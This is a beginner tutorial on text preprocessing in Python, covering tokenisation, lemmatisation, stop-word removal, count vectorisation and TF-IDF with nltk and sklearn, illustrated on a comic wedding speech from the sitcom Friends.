measures how well the regression line fits with the actual results. Let’s dive deeper." }, { "code": null, "e": 14885, "s": 14869, "text": "Its formula is:" }, { "code": null, "e": 14935, "s": 14885, "text": "R-squared = Explained variation / Total variation" }, { "code": null, "e": 15071, "s": 14935, "text": "Explained Variance = Sum of Squares due to Regression (SSR) [do not confuse with RSS (Residual Sum of Squares), which is also called SSE]" }, { "code": null, "e": 15134, "s": 15071, "text": "Sum of Squares Total (SST) = SSR + SSE (Sum of Squared Errors)" }, { "code": null, "e": 15278, "s": 15134, "text": "You can look at it as SSE being the “Unexplained Variation”. Remember that SSE sums the errors between your actual (y) and your predicted (y-hat)." }, { "code": null, "e": 15426, "s": 15278, "text": "Total Variation = SST (Sum of Squares Total): the sum of squared differences between each observed value and the overall mean of the variable (y - ybar)." }, { "code": null, "e": 15468, "s": 15426, "text": "So R-squared essentially looks like this: R-squared = SSR / SST, equivalently 1 - (SSE / SST)." }, { "code": null, "e": 15531, "s": 15468, "text": "Now that that’s clarified, let’s check out Adjusted R-Squared." }, { "code": null, "e": 15701, "s": 15531, "text": "Because your numerator is a SUM of squared terms, adding more predictors (x variables) will never decrease the R-squared, making it misleading as the number of predictors increases." }, { "code": null, "e": 15794, "s": 15701, "text": "The adjusted R-squared, on the other hand, accounts for the increase in the number of predictors (its formula appears in a short sketch after this section)." }, { "code": null, "e": 15859, "s": 15794, "text": "n refers to the number of data points (E.g rows in your dataset)" }, { "code": null, "e": 15897, "s": 15859, "text": "k refers to the number of x variables" }, { "code": null, "e": 16011, "s": 15897, "text": "Because of the nature of the equation, the Adjusted R-Squared should always be lower than or equal to the R-Squared." }, { "code": null, "e": 16369, "s": 16011, "text": "A good way to use Adjusted R square is to perhaps run a few iterations of the model with different variables (e.g do a stepwise regression). 
You can see how the adjusted R squared increases and maybe hits an optimal point before decreasing when more variables are added. You should then keep it at those variables that gave you the optimal adjusted R squared." }, { "code": null, "e": 16518, "s": 16369, "text": "Any variables that are able to predict the outcome variable significantly, and thus improve your accuracy, will lead to a higher Adjusted R-Squared." }, { "code": null, "e": 16578, "s": 16518, "text": "Take a breather. Congrats on reaching the end of this post!" }, { "code": null, "e": 16683, "s": 16578, "text": "The next one will cover the actual modelling using gretl and python, and more ways of checking accuracy." } ]
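A minimal pandas sketch of the dummy-variable encoding described above. The colour column and dataframe are made-up illustrations, and the most frequent category is dropped so that it becomes the reference category, as the post recommends:

import pandas as pd

# Hypothetical data: a nominal 'colour' column
df = pd.DataFrame({'colour': ['Grey', 'Red', 'Blue', 'Grey', 'Grey']})

# Create one dummy column per colour
dummies = pd.get_dummies(df['colour'], prefix='colour')

# Drop the dummy of the most frequent category (here 'Grey'),
# making it the reference category
reference = df['colour'].value_counts().idxmax()
dummies = dummies.drop(columns='colour_' + reference)

df = pd.concat([df.drop(columns='colour'), dummies], axis=1)
print(df)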
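A small sketch of the zip-code-to-region grouping idea. The codes and the zip_to_region lookup are entirely hypothetical; in practice the mapping would come from domain knowledge or research, as noted above:

import pandas as pd

df = pd.DataFrame({'zip_code': ['323348', '529510', '018956']})

# Hypothetical lookup built from domain knowledge / research
zip_to_region = {'323348': 'North', '529510': 'East', '018956': 'South'}

df['region'] = df['zip_code'].map(zip_to_region)

# 'region' (a handful of levels) can now be one hot encoded,
# instead of hundreds of unique zip codes
df = pd.get_dummies(df, columns=['region'], prefix='region')
print(df)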
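A bare-bones sketch of the forward selection procedure described above, using adjusted R-squared as the metric (the post lists several valid metrics; this is just one choice). X and y are placeholders for a predictor dataframe and a target series:

import statsmodels.api as sm

def forward_selection(X, y):
    # Greedily add the variable that most improves adjusted R-squared
    remaining = list(X.columns)
    selected = []
    best_adj_r2 = -float('inf')
    while remaining:
        # Score each remaining candidate when added to the current set
        scores = {}
        for candidate in remaining:
            cols = selected + [candidate]
            model = sm.OLS(y, sm.add_constant(X[cols])).fit()
            scores[candidate] = model.rsquared_adj
        best_candidate = max(scores, key=scores.get)
        # Stop once adding no longer improves the metric
        if scores[best_candidate] <= best_adj_r2:
            break
        best_adj_r2 = scores[best_candidate]
        selected.append(best_candidate)
        remaining.remove(best_candidate)
    return selected

# chosen = forward_selection(X, y)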
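A quick sketch of the pairwise correlation check mentioned above; the data is synthetic (x2 is deliberately almost a copy of x1) and the 0.9 threshold is an arbitrary illustration:

import numpy as np
import pandas as pd

rng = np.random.default_rng(0)
x1 = rng.normal(size=100)
X = pd.DataFrame({'x1': x1,
                  'x2': 2 * x1 + rng.normal(scale=0.01, size=100),
                  'x3': rng.normal(size=100)})

# Absolute pairwise correlations between predictors
corr = X.corr().abs()

# Report highly correlated pairs (upper triangle only, to avoid duplicates)
for i, col_a in enumerate(corr.columns):
    for col_b in corr.columns[i + 1:]:
        if corr.loc[col_a, col_b] > 0.9:
            print(col_a, col_b, round(corr.loc[col_a, col_b], 2))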
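The adjusted R-squared formula referenced above was an image in the original post; this is the standard formula, plugging in the n and k defined there:

Adjusted R-squared = 1 - (1 - R-squared) * (n - 1) / (n - k - 1)

def adjusted_r_squared(r2, n, k):
    # n: number of data points, k: number of x variables
    return 1 - (1 - r2) * (n - 1) / (n - k - 1)

print(adjusted_r_squared(0.85, 100, 5))  # roughly 0.842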
Node.js crypto.createVerify() Method
11 Oct, 2021
The crypto.createVerify() method is used to create a Verify object that uses the stated algorithm. Moreover, you can use crypto.getHashes() to access the names of all the available signing algorithms.
Syntax:
crypto.createVerify( algorithm, options )
Parameters: This method accepts two parameters as mentioned above and described below:
algorithm: It is a string type value. A Verify instance can be created by applying the name of a signature algorithm, like ‘RSA-SHA256’, in place of a digest algorithm.
options: It is an optional parameter that is used to control stream behavior. It returns an object.
Return Value: It returns a Verify object.
Below examples illustrate the use of the crypto.createVerify() method in Node.js:
Example 1:
// Node.js program to demonstrate the
// crypto.createVerify() method

// Including crypto module
const crypto = require('crypto');

// Creating verify object with its algo
const verify = crypto.createVerify('SHA256');

// Returns the 'Verify' object
console.log(verify);
Output:
Verify {
  _handle: {},
  _writableState:
   WritableState {
     objectMode: false,
     highWaterMark: 16384,
     finalCalled: false,
     needDrain: false,
     ending: false,
     ended: false,
     finished: false,
     destroyed: false,
     decodeStrings: true,
     defaultEncoding: 'utf8',
     length: 0,
     writing: false,
     corked: 0,
     sync: true,
     bufferProcessing: false,
     onwrite: [Function: bound onwrite],
     writecb: null,
     writelen: 0,
     bufferedRequest: null,
     lastBufferedRequest: null,
     pendingcb: 0,
     prefinished: false,
     errorEmitted: false,
     emitClose: true,
     autoDestroy: false,
     bufferedRequestCount: 0,
     corkedRequestsFree:
      { next: null,
        entry: null,
        finish: [Function: bound onCorkedFinish] } },
  writable: true,
  domain: null,
  _events: [Object: null prototype] {},
  _eventsCount: 0,
  _maxListeners: undefined }
Example 2:
// Node.js program to demonstrate the
// crypto.createVerify() method

// Including crypto module
const crypto = require('crypto');

// Creating verify object with its algo
const verify = crypto.createVerify('SHA256');

// Writing data to be signed and verified
verify.write('some text to sign');

// Calling end method
verify.end();

// Beginning public key
const l1 = "-----BEGIN PUBLIC KEY-----\n"

// Encrypted data
const l2 = "MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEXIvPbzLjaPLd8jgiv1TL/X8PXpJNgDkGRj9U9Lcx1yKURpQFVavcMkfWyO8r7JlZNMax0JKfLZUM1IePRjHlFw=="

// Ending public key
const l3 = "\n-----END PUBLIC KEY-----"

// Constructing public key
const publicKey = l1 + l2 + l3

// Signature to be verified
const signature = "MEYCIQCPfWhpzxMqu3gZWflBm5V0aetgb2/S+SGyGcElaOjgdgIhALaD4lbxVwa8HUUBFOLz+CGvIioDkf9oihSnXHCqh8yV";

// Prints true if verified else false
console.log(verify.verify(publicKey, signature));
Output:
false
Reference: https://nodejs.org/api/crypto.html#crypto_crypto_createverify_algorithm_options
Node.js-crypto-module Node.js Web Technologies
[ { "code": null, "e": 28, "s": 0, "text": "\n11 Oct, 2021" }, { "code": null, "e": 229, "s": 28, "text": "The crypto.createVerify() method is used to create a Verify object that uses the stated algorithm. Moreover, you can use crypto.getHashes() to access the names of all the available signing algorithms." }, { "code": null, "e": 237, "s": 229, "text": "Syntax:" }, { "code": null, "e": 279, "s": 237, "text": "crypto.createVerify( algorithm, options )" }, { "code": null, "e": 365, "s": 279, "text": "Parameters: This method accept two parameters as mentioned above and described below:" }, { "code": null, "e": 534, "s": 365, "text": "algorithm: It is a string type value. A Sign instance can be created by applying the name of a signature algorithms, like ‘RSA-SHA256’, in place of a digest algorithms." }, { "code": null, "e": 634, "s": 534, "text": "options: It is an optional parameter that is used to control stream behavior. It returns an object." }, { "code": null, "e": 674, "s": 634, "text": "Return Value: It returns Verify object." }, { "code": null, "e": 752, "s": 674, "text": "Below examples illustrate the use of crypto.createVerify() method in Node.js:" }, { "code": null, "e": 763, "s": 752, "text": "Example 1:" }, { "code": "// Node.js program to demonstrate the // crypto.createVerify() method // Including crypto moduleconst crypto = require('crypto'); // Creating verify object with its algoconst verify = crypto.createVerify('SHA256'); // Returns the 'Verify' objectconsole.log(verify);", "e": 1032, "s": 763, "text": null }, { "code": null, "e": 1040, "s": 1032, "text": "Output:" }, { "code": null, "e": 1969, "s": 1040, "text": "Verify {\n _handle: {},\n _writableState:\n WritableState {\n objectMode: false,\n highWaterMark: 16384,\n finalCalled: false,\n needDrain: false,\n ending: false,\n ended: false,\n finished: false,\n destroyed: false,\n decodeStrings: true,\n defaultEncoding: 'utf8',\n length: 0,\n writing: false,\n corked: 0,\n sync: true,\n bufferProcessing: false,\n onwrite: [Function: bound onwrite],\n writecb: null,\n writelen: 0,\n bufferedRequest: null,\n lastBufferedRequest: null,\n pendingcb: 0,\n prefinished: false,\n errorEmitted: false,\n emitClose: true,\n autoDestroy: false,\n bufferedRequestCount: 0,\n corkedRequestsFree:\n { next: null,\n entry: null,\n finish: [Function: bound onCorkedFinish] } },\n writable: true,\n domain: null,\n _events: [Object: null prototype] {},\n _eventsCount: 0,\n _maxListeners: undefined }\n" }, { "code": null, "e": 1980, "s": 1969, "text": "Example 2:" }, { "code": "// Node.js program to demonstrate the // crypto.createVerify() method // Including crypto moduleconst crypto = require('crypto'); // Creating verify object with its algoconst verify = crypto.createVerify('SHA256'); // Writing data to be signed and verifiedverify.write('some text to sign'); // Calling end methodverify.end(); // Beginning public key const l1 = \"-----BEGIN PUBLIC KEY-----\\n\" // Encrypted data const l2 = \"MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEXIvPbzLjaPLd8jgiv1TL/X8PXpJNgDkGRj9U9Lcx1yKURpQFVavcMkfWyO8r7JlZNMax0JKfLZUM1IePRjHlFw==\" // Ending public key const l3 = \"\\n-----END PUBLIC KEY-----\" // Constructing public key const publicKey = l1 + l2 + l3 // Signature to be verified const signature = \"MEYCIQCPfWhpzxMqu3gZWflBm5V0aetgb2/S+SGyGcElaOjgdgIhALaD4lbxVwa8HUUBFOLz+CGvIioDkf9oihSnXHCqh8yV\"; // Prints true if verified else false console.log(verify.verify(publicKey, signature));", "e": 2938, "s": 1980, "text": null }, { "code": null, "e": 2946, "s": 
2938, "text": "Output:" }, { "code": null, "e": 2953, "s": 2946, "text": "false\n" }, { "code": null, "e": 3044, "s": 2953, "text": "Reference: https://nodejs.org/api/crypto.html#crypto_crypto_createverify_algorithm_options" }, { "code": null, "e": 3066, "s": 3044, "text": "Node.js-crypto-module" }, { "code": null, "e": 3074, "s": 3066, "text": "Node.js" }, { "code": null, "e": 3091, "s": 3074, "text": "Web Technologies" } ]
Rebasing of branches in Git
03 May, 2020
Branching means to split from the master branch so that you can work separately without affecting the main code and other developers. On creating a Git repository, by default, we are assigned the master branch. As we start making commits, this master branch keeps updating and points to the last commit made to the repository. Branching in Git looks like this:
Rebasing in Git is a process of integrating a series of commits on top of another base tip. It takes all the commits of a branch and appends them to the commits of a new branch. Git rebasing looks as follows:
The technical syntax of the rebase command is:
git rebase [-i | --interactive] [options] [--exec cmd] [--onto newbase | --keep-base] [upstream [branch]]
Usage: The main aim of rebasing is to maintain a progressively straight and cleaner project history. Rebasing gives rise to a perfectly linear project history which can follow the end commit of the feature all the way to the beginning of the project without even forking. This makes it easier to navigate your project.
Git rebase is in interactive mode when the rebase command accepts an -i argument. This stands for Interactive. Without any arguments, the command runs in Standard mode.
In order to achieve standard rebasing, we follow the following command:
git rebase master branch_x

where branch_x is the branch we want to rebase
The above command is equivalent to the following command and will automatically take the commits in your current working branch and apply them to the head of the branch which will be mentioned:
git rebase master
Whereas, in Interactive rebasing, you can alter individual commits as they are moved to the new branch. It offers you complete control over the branch’s commit history. In order to achieve interactive rebasing, we follow the following command:
git checkout branch_x
git rebase -i master
This command lists all the commits which are about to be moved, asks about rebasing each commit individually, and then rebases them according to the choices you entered. This gives you complete control over what your project history looks like.
Both merge and rebase are used to merge branches but the difference lies in the commit history after you integrate one branch into another. In Git merging, commits from all the developers who made commits will be there in the git log. This is really good for beginners because the head can be rolled back to a commit from any of the developers. Whereas, in git rebase, commits from only a single developer will be stamped in the git log. Advanced developers prefer this because it makes the commit history linear and clean. The command for merging is given as:
git merge branch_x master
This creates a new commit in the merged branch that ties together the histories of both branches, giving you a branch structure that looks like this, as opposed to the rebasing we saw above:
Note: After performing rebasing, we are by default on the last commit of the rebased branch.
Picked Git
[ { "code": null, "e": 28, "s": 0, "text": "\n03 May, 2020" }, { "code": null, "e": 388, "s": 28, "text": "Branching means to split from the master branch so that you can work separately without affecting the main code and other developers. On creating a Git repository, by default, we are assigned the master branch. As we start making commits, this master branch keeps updating and points to the last commit made to the repository.Branching in Git looks like this:" }, { "code": null, "e": 593, "s": 388, "text": "Rebasing in Git is a process of integrating a series of commits on top of another base tip. It takes all the commits of a branch and appends them to commits of a new branch. Git rebasing looks as follows:" }, { "code": null, "e": 636, "s": 593, "text": "The technical syntax of rebase command is:" }, { "code": null, "e": 740, "s": 636, "text": "git rebase [-i | –interactive] [ options ] [–exec cmd] [–onto newbase | –keep-base] [upstream [branch]]" }, { "code": null, "e": 1058, "s": 740, "text": "Usage:The main aim of rebasing is to maintain a progressively straight and cleaner project history. Rebasing gives rise to a perfectly linear project history which can follow the end commit of the feature all the way to the beginning of the project without even forking. This makes it easier to navigate your project." }, { "code": null, "e": 1228, "s": 1058, "text": "Git rebase is in interactive mode when the rebase command accepts an — i argument. This stands for Interactive. Without any arguments, the command runs in Standard mode." }, { "code": null, "e": 1300, "s": 1228, "text": "In order to achieve standard rebasing, we follow the following command:" }, { "code": null, "e": 1375, "s": 1300, "text": "git rebase master branch_x\n\nwhere branch_x is the branch we want to rebase" }, { "code": null, "e": 1569, "s": 1375, "text": "The above command is equivalent to the following command and will automatically take the commits in your current working branch and apply them to the head of the branch which will be mentioned:" }, { "code": null, "e": 1587, "s": 1569, "text": "git rebase master" }, { "code": null, "e": 1830, "s": 1587, "text": "Whereas, in Interactive rebasing, you can alter individual commits as they are moved to the new branch. It offers you complete control over the branch’s commit history.In order to achieve interactive rebasing, we follow the following command:" }, { "code": null, "e": 1873, "s": 1830, "text": "git checkout branch_x\ngit rebase -i master" }, { "code": null, "e": 2117, "s": 1873, "text": "This command lists all the commits which are about to be moved and asks for rebasing all commits individually and then rebase them according to the choices you entered. This gives you complete control over what your project history looks like." }, { "code": null, "e": 2670, "s": 2117, "text": "Both merge and rebase are used to merge branches but the difference lies in the commit history after you integrate one branch into another. In Git merging, commits from all the developers who made commits will be there in the git log. This is really good for beginners cause the head can be rolled back to commit from any of the developers. Whereas, in git rebase, commit from only a single developer will be stamped in the git log. 
Advanced developers prefer this cause it makes the commit history linear and clean.The command for merging is given as:" }, { "code": null, "e": 2696, "s": 2670, "text": "git merge branch_x master" }, { "code": null, "e": 2887, "s": 2696, "text": "This creates a new commit in the merged branch that ties together the histories of both branches, giving you a branch structure that looks like this as opposed to rebasing what we saw above:" }, { "code": null, "e": 2980, "s": 2887, "text": "Note: After performing rebasing, we are by default on the last commit of the rebased branch." }, { "code": null, "e": 2987, "s": 2980, "text": "Picked" }, { "code": null, "e": 2991, "s": 2987, "text": "Git" }, { "code": null, "e": 3089, "s": 2991, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 3137, "s": 3089, "text": "Git - Difference Between Git Fetch and Git Pull" }, { "code": null, "e": 3172, "s": 3137, "text": "How to Set Upstream Branch on Git?" }, { "code": null, "e": 3206, "s": 3172, "text": "How to Push Git Branch to Remote?" }, { "code": null, "e": 3248, "s": 3206, "text": "How to Export Eclipse projects to GitHub?" }, { "code": null, "e": 3287, "s": 3248, "text": "Merge Conflicts and How to handle them" }, { "code": null, "e": 3326, "s": 3287, "text": "How to Add Git Credentials in Eclipse?" }, { "code": null, "e": 3350, "s": 3326, "text": "What is README.md File?" }, { "code": null, "e": 3370, "s": 3350, "text": "Git - Origin Master" }, { "code": null, "e": 3431, "s": 3370, "text": "How to Add Videos on README .md File in a GitHub Repository?" } ]
What are n, bins and patches in matplotlib?
The hist() method returns n, bins and patches in matplotlib. Patches are the containers of individual artists used to create the histogram, or a list of such containers if there are multiple input datasets. Bins define the number of equal-width bins in the range.
Let's take an example to understand how it works.
Set the figure size and adjust the padding between and around the subplots.
Create random data points using numpy.
Make a Hist plot with 100 bins.
Set a property on an artist object.
To display the figure, use show() method.
import numpy as np
import matplotlib.pyplot as plt

plt.rcParams["figure.figsize"] = [7.50, 3.50]
plt.rcParams["figure.autolayout"] = True

x = np.random.normal(size=100)

n, bins, patches = plt.hist(x, bins=100)

plt.setp(patches[0], 'facecolor', 'yellow')

plt.show()
A short check of what these return values hold follows the example below.
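A small follow-up sketch, reusing the n, bins and patches returned above, to see what each actually holds (the printed counts and edges will vary because the data is random):

# n holds the count of data points in each of the 100 bins
print(len(n), n[:5])

# bins holds the 101 bin edges delimiting those bins
print(len(bins), bins[:5])

# patches holds the histogram's bar artists, one per bin
print(len(patches))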
[ { "code": null, "e": 1323, "s": 1062, "text": "The hist() method returns n, bins and patches in matplotlib. Patches are the containers of individual artists used to create the histogram or list of such containers if there are multiple input datasets. Bins define the number of equal-width bins in the range." }, { "code": null, "e": 1373, "s": 1323, "text": "Let's take an example to understand how it works." }, { "code": null, "e": 1449, "s": 1373, "text": "Set the figure size and adjust the padding between and around the subplots." }, { "code": null, "e": 1525, "s": 1449, "text": "Set the figure size and adjust the padding between and around the subplots." }, { "code": null, "e": 1564, "s": 1525, "text": "Create random data points using numpy." }, { "code": null, "e": 1603, "s": 1564, "text": "Create random data points using numpy." }, { "code": null, "e": 1635, "s": 1603, "text": "Make a Hist plot with 100 bins." }, { "code": null, "e": 1667, "s": 1635, "text": "Make a Hist plot with 100 bins." }, { "code": null, "e": 1703, "s": 1667, "text": "Set a property on an artist object." }, { "code": null, "e": 1739, "s": 1703, "text": "Set a property on an artist object." }, { "code": null, "e": 1781, "s": 1739, "text": "To display the figure, use show() method." }, { "code": null, "e": 1823, "s": 1781, "text": "To display the figure, use show() method." }, { "code": null, "e": 2093, "s": 1823, "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\nplt.rcParams[\"figure.figsize\"] = [7.50, 3.50]\nplt.rcParams[\"figure.autolayout\"] = True\n\nx = np.random.normal(size=100)\n\nn, bins, patches = plt.hist(x, bins=100)\n\nplt.setp(patches[0], 'facecolor', 'yellow')\n\nplt.show()" } ]
Introduction to NLP - Part 1: Preprocessing text in Python | by Zolzaya Luvsandorj | Towards Data Science
Welcome to Introduction to NLP! This is the first part of the 5-part series of posts. This post will show one way to preprocess text using an approach called bag-of-words where each text is represented by its words regardless of the order in which they are presented or the embedded grammar. We will complete the following steps when preprocessing:
1. Tokenise
2. Normalise
3. Remove stop words
4. Count vectorise
5. Transform to tf-idf representation
💤 Do these terms look like gibberish to you? Don’t worry, they will no longer be by the time you finish reading this post! 🎓 I assume the reader (👀 yes, you!) has access to and is familiar with Python including installing packages, defining functions and other basic tasks. If you are new to Python, this is a good place to get started. I have used and tested the scripts in Python 3.7.1. Let’s make sure you have the right tools before we get started. We will use the following powerful third party packages:
pandas: Data analysis library,
nltk: Natural Language Tool Kit library and
sklearn: Machine Learning library.
The script below can help you download these corpora. If you have already downloaded them, running this will notify you that they are up-to-date:
import nltk
nltk.download('stopwords')
nltk.download('wordnet')
To keep things manageable, we will use tiny text data which will allow us to monitor inputs and outputs for each step. For this data, I have chosen Joey’s draft speech for Chandler and Monica’s wedding from the sitcom Friends. His speech goes:
part1 = """We are gathered here today on this joyous occasion to celebrate the special love that Monica and Chandler share. It is a love based on giving and receiving as well as having and sharing. And the love that they give and have is shared and received. And through this having and giving and sharing and receiving, we too can share and love and have... and receive."""
part2 = """When I think of the love these two givers and receivers share I cannot help but envy the lifetime ahead of having and loving and giving and receiving."""
If you haven’t seen the part I am referring to, there are short videos available on YouTube (keywords: Joey’s wedding speech). I think Joey’s acting and Monica and Chandler’s reaction definitely makes this speech much funnier than the mere text. Writing this post gave me a nice excuse to watch the scene repeatedly and I can’t get enough of it. 
🙈 Firstly, let’s prepare the environment with packages and data:
# Import packages and modules
import pandas as pd
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import RegexpTokenizer
from nltk.corpus import stopwords
from sklearn.feature_extraction.text import TfidfVectorizer

# Create a dataframe
X_train = pd.DataFrame([part1, part2], columns=['speech'])
Secondly, let’s define a text preprocessing function to pass it on to TfidfVectorizer:
def preprocess_text(text):
    # Tokenise words while ignoring punctuation
    tokeniser = RegexpTokenizer(r'\w+')
    tokens = tokeniser.tokenize(text)

    # Lowercase and lemmatise
    lemmatiser = WordNetLemmatizer()
    lemmas = [lemmatiser.lemmatize(token.lower(), pos='v') for token in tokens]

    # Remove stopwords
    keywords = [lemma for lemma in lemmas if lemma not in stopwords.words('english')]
    return keywords
Lastly, let’s preprocess the text data by leveraging the function defined earlier:
# Create an instance of TfidfVectorizer
vectoriser = TfidfVectorizer(analyzer=preprocess_text)

# Fit to the data and transform to feature matrix
X_train = vectoriser.fit_transform(X_train['speech'])

# Convert sparse matrix to dataframe
X_train = pd.DataFrame.sparse.from_spmatrix(X_train)

# Save mapping on which index refers to which words
col_map = {v: k for k, v in vectoriser.vocabulary_.items()}

# Rename each column using the mapping
for col in X_train.columns:
    X_train.rename(columns={col: col_map[col]}, inplace=True)
X_train
Ta-da❕ We have preprocessed the text into a feature matrix. Do these scripts make much sense without any explanation? Let’s break this down and understand the 5 steps mentioned at the beginning with examples in the next section.
💡 “Given a character sequence and a defined document unit, tokenization is the task of chopping it up into pieces, called tokens, perhaps at the same time throwing away certain characters, such as punctuation.”
In this step, we will convert the string part1 into a list of tokens while discarding punctuation. There are many ways we could accomplish this task. I will show you one way to do so by using RegexpTokenizer from nltk:
# Import module
from nltk.tokenize import RegexpTokenizer

# Create an instance of RegexpTokenizer for alphanumeric tokens
tokeniser = RegexpTokenizer(r'\w+')

# Tokenise 'part1' string
tokens = tokeniser.tokenize(part1)
print(tokens)
Let’s inspect how the tokens look:
We see that each word is now a separate string. Do you notice how there are variations of the same word? For instance: words can differ in terms of their case: ‘and’ and ‘And’ or their suffix: ‘share’, ‘shared’ and ‘sharing’. This is where normalisation comes in to standardise.
💡 To normalise a word is to transform it into its root form.
Stemming and lemmatisation are popular ways to normalise text. In this step, we will use lemmatisation to transform words to their dictionary form as well as remove case distinction by converting all words to lowercase.
🔗 If you want to learn more about stemming and lemmatisation, you may want to check out the second part of the series.
We will use WordNetLemmatizer from nltk to lemmatise our tokens:
# Import module
from nltk.stem import WordNetLemmatizer

# Create an instance of WordNetLemmatizer
lemmatiser = WordNetLemmatizer()

# Lowercase and lemmatise tokens
lemmas = [lemmatiser.lemmatize(token.lower(), pos='v') for token in tokens]
print(lemmas)
The words are now transformed to their dictionary form. For instance, ‘share’, ‘sharing’ and ‘shared’ are now all just ‘share’. 
# Check how many words we have
len(lemmas)
We have 66 words but not all words carry the same level of contribution to the meaning of the text. In other words, there are some words that are not particularly useful to the key message. This is where stop words come in.
💡 Stop words are common words which provide little to no value to the meaning of the text.
Think about this: If you had to describe yourself in three words as elaborately as possible, would you include ‘I’, or ‘am’? If I asked you to underline keywords in Joey’s speech, would you underline ‘a’ or ‘the’? Probably not. The ‘I’, ‘am’, ‘a’ and ‘the’ are examples of stop words. I think you get the idea.
Different sets of stop words may be necessary depending on the domain that the text is related to. In this step, we will leverage nltk’s stopwords corpus. You could define your own set of stop words or enrich standard stop words by adding common terms that are appropriate to the domain of the text (a small sketch of this is included as a footnote after this post).
Let’s first familiarise ourselves with stopwords a little bit more:
# Import module
from nltk.corpus import stopwords

# Check out how many stop words there are
print(len(stopwords.words('english')))

# See first 5 stop words
stopwords.words('english')[:5]
At the time of writing this post, there are 179 English stop words in nltk’s stopword corpus. Some examples include: ‘i’, ‘me’, ‘my’, ‘myself’, ‘we’. If you are curious to see the full list, simply remove [:5] from the last line of code.
Notice how these stop words are in lowercase? To effectively remove stop words, we have to ensure that all words are in lowercase. Here, we have already done so in step two.
Using a list comprehension, let’s remove all stop words from our list:
keywords = [lemma for lemma in lemmas if lemma not in stopwords.words('english')]
print(keywords)
# Check how many words we have
len(keywords)
After removing stop words, we only have 26 words as opposed to 66 yet the gist is still preserved.
Now, if you scroll back up to section 2 (Final Code) and have a quick look at the preprocess_text function, you will see that this function captures the transformation process shown in steps 1 to 3.
💡 Count vectorise is to convert a collection of text documents to a matrix of token counts.
Now let’s look at counts of each word in keywords from step 3:
{word: keywords.count(word) for word in set(keywords)}
The word ‘give’ occurs 3 times whereas ‘joyous’ was mentioned once.
This is essentially what CountVectorizer does to all records. CountVectorizer transforms text into a matrix of m by n where m is the number of text records, n is the number of unique tokens across all records and the elements of the matrix refer to the tally of a token for a given record.
In this step, we will convert our text dataframe to a count matrix. We will pass our custom preprocessor function to CountVectorizer:
# Import module
from sklearn.feature_extraction.text import CountVectorizer

# Create an instance of CountVectorizer
vectoriser = CountVectorizer(analyzer=preprocess_text)

# Fit to the data and transform to feature matrix
X_train = vectoriser.fit_transform(X_train['speech'])
The output feature matrix will be in sparse matrix form. 
Let’s convert it to a dataframe with proper column names to make it more readable:
# Convert sparse matrix to dataframe
X_train = pd.DataFrame.sparse.from_spmatrix(X_train)

# Save mapping on which index refers to which terms
col_map = {v: k for k, v in vectoriser.vocabulary_.items()}

# Rename each column using the mapping
for col in X_train.columns:
    X_train.rename(columns={col: col_map[col]}, inplace=True)
X_train
Once we transform it to a dataframe, the columns would be just indices (i.e. numbers from 0 to n-1) instead of the actual words. Therefore, we need to rename the columns to make it easier to interpret.
When the vectoriser is fit to the data, we can find out the index mapping to words from vectoriser.vocabulary_. This index mapping is formatted as {word: index}. To rename columns, we must switch the key-value pairs to {index: word}. This is done in the second line of code and saved in col_map.
Using the for loop at the end of the code, we are renaming each column using the mapping, and the output should look like what is in the table above (showing only partial output due to space limitation).
From this matrix, we can see ‘give’ has been mentioned 3 times in part1 (row index=0) and once in part2 (row index=1).
In our example, we only have 2 records each consisting of only a handful of sentences, so the count matrix is pretty small and its sparsity is not as high. Sparsity refers to the proportion of zero elements among all elements in a matrix. When you are working on real data with hundreds, thousands or even millions of records each represented by rich text, the count matrix is likely to be extremely large and contain mostly 0s. In those instances, using sparse format saves storage memory and speeds up further processing. As a result, you may not always convert a sparse matrix to a dataframe like we did here for illustration when preprocessing text in real life.
💡 tf-idf stands for term frequency inverse document frequency.
When transforming to tf-idf representation, we are transforming the counts to weighted frequencies where we give more significance to less frequent words and less importance to more frequent words by using a weight called inverse document frequency.
🔗 I have dedicated a separate post to explain this in detail in the third part of the series because I think it deserves its own section.
# Import module
from sklearn.feature_extraction.text import TfidfTransformer

# Create an instance of TfidfTransformer
transformer = TfidfTransformer()

# Fit to the data and transform to tf-idf
X_train = pd.DataFrame(transformer.fit_transform(X_train).toarray(), columns=X_train.columns)
X_train
In the last step, we ensured that the output is still a properly named dataframe:
Now that we understand step 4 and step 5 individually, I would like to point out that there is a more efficient way to complete steps 4 and 5 using TfidfVectorizer. Such is accomplished using the code below:
# Import module
from sklearn.feature_extraction.text import TfidfVectorizer

# Create an instance of TfidfVectorizer
vectoriser = TfidfVectorizer(analyzer=preprocess_text)

# Fit to the data and transform to tf-idf
X_train = vectoriser.fit_transform(X_train['speech'])
To make this sparse matrix output into a dataframe with relevant column names, you know what to do (hint: see what we did in step 4).
Having covered all steps, if you go back to the scripts in section 2 (Final Code) again, does it look more familiar than the first time you saw it? 👀
Would you like to access more content like this? 
Medium members get unlimited access to any articles on Medium. If you become a member using my referral link, a portion of your membership fee will directly go to support me.
Thank you for taking the time to go through this post. I hope that you learned something from reading it. Links to the rest of the posts are collated below:
◼️ Part 1: Preprocessing text in Python
◼️ Part 2: Difference between lemmatisation and stemming
◼️ Part 3: TF-IDF explained
◼️ Part 4: Supervised text classification model in Python
◼️ Part 5A: Unsupervised topic model in Python (sklearn)
◼️ Part 5B: Unsupervised topic model in Python (gensim)
Happy preprocessing! Bye for now 🏃💨
Manning, Christopher D., Prabhakar Raghavan and Hinrich Schütze. Introduction to Information Retrieval. Cambridge University Press, 2008.
Bird, Steven, Edward Loper and Ewan Klein. Natural Language Processing with Python. O’Reilly Media Inc., 2009.
Feature Extraction, sklearn documentation.
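A footnote to the stop words step above: a minimal sketch of enriching nltk's standard stop words with domain terms, as suggested in step 3. The added words are arbitrary examples, and lemmas stands in for the list produced in step 2:

from nltk.corpus import stopwords

# Start from nltk's standard English stop words
custom_stop_words = set(stopwords.words('english'))

# Enrich with domain-specific terms (arbitrary examples)
custom_stop_words.update(['monica', 'chandler'])

# A set also makes the membership check faster than a list
keywords = [lemma for lemma in lemmas if lemma not in custom_stop_words]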
